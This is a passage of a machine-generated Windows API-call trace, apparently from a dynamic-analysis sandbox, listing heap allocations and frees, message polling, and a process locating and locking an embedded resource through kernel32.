[0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2f8 | out: hHeap=0x12c0000) returned 1 [0119.737] LoadResource (hModule=0x0, hResInfo=0xfe7698) returned 0x1039998 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd868 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd748 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0119.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0119.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd748 | out: hHeap=0x12c0000) returned 1 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0119.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0119.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0119.738] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.738] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.739] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.739] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x14bd3d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LockResource", lpUsedDefaultChar=0x0) returned 13 [0119.739] GetProcAddress (hModule=0x74650000, lpProcName="LockResource") returned 0x74667890 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0119.740] LockResource (hResData=0x1039998) returned 0x1039998 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.741] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff370 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0119.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.742] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.742] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.743] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d98 | out: hHeap=0x12c0000) returned 1 [0119.743] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458fd8 [0119.743] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458fd8 | out: hHeap=0x12c0000) returned 1 [0119.743] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919b8 [0119.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919b8 | out: hHeap=0x12c0000) returned 1 [0119.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e18 [0119.744] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e18 | out: hHeap=0x12c0000) returned 1 [0119.744] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff168 [0119.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fefb0 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff168 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefb0 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.745] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.745] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.746] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.746] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0119.747] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff168 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491a18 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fefb0 [0119.748] CharLowerBuffW (in: lpsz="byte[115217]", cchLength=0xc | out: lpsz="byte[115217]") returned 0xc [0119.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be0a8 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0119.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefb0 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff168 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491a98 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be048 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be0a8 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, 